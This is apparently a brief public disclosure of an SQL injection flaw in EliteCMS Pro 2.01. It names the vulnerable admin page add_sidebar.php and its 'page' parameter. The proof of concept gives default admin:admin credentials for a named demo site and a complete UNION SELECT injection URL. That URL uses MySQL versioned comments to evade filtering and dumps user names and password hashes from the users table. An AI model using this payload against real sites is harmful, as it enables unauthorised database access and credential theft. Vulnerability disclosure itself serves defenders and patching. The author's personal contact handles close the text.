I found an Sql injection Vulnerability on EliteCMS Pro 2.01. POC: ------ - go http://demo.elitecms.net/admin/ - login as admin:admin - in http://demo.elitecms.net/admin/add_sidebar.php the "?page=" parameter is vulnerable. you can inject here. - example: http://demo.elitecms.net/admin/add_sidebar.php?page=-5+/*!50000union*/+/*!50000select*/+1,2,3,4,/*!50000GrOUP_CONCAT(user_name,%22%20%22,h_password)*/,6,7,8,9,10,11,12,13,14,15+from+/*!50000users*/ -------- Selim Can Ă–zdemir telegram: @manthatyoufear twitter: @00selimcan mail: ozdemirselimcan@gmail.com